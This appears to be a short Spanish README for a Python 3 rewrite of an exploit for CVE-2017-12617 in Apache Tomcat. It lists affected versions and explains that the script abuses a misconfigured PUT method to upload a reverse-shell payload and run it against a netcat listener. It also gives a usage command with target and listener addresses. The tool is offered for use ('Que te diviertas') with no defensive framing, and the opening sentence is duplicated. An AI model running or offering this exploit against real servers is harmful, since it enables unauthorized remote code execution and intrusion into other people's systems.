
CVE-2017-12617 es una vulnerabilidad crítica que conduce a la Ejecución Remota de Código (RCE) en Apache Tomcat.
CVE-2017-12617 es una vulnerabilidad crítica que conduce a la Ejecución Remota de Código (RCE) en Apache Tomcat.
Esta vulnerabilidad afecta a las versiones 9.0.0.M1 - 9.0.0, 8.5.0-8.5.22, 8.0.0.RC1 - 8.0.46, 7.0.0 - 7.0.81.
Probada solo en 8.0.24. La vulnerabilidad utiliza la opción PUT mal configurada en la aplicación o en la propia instancia de Tomcat.
Utiliza PUT para enviar un payload de reverse shell al servidor y ejecutarlo, mientras escucha con netcat.
Dado que hay muchas versiones del mismo exploit en Internet pero basadas en python2, lo he reescrito para que funcione con Python 3.
Que te diviertas.
Ejemplo de uso:
python3 cve-2017-12617.py -t 127.0.0.1 -p 8888 -l 192.168.1.118 -P 5555
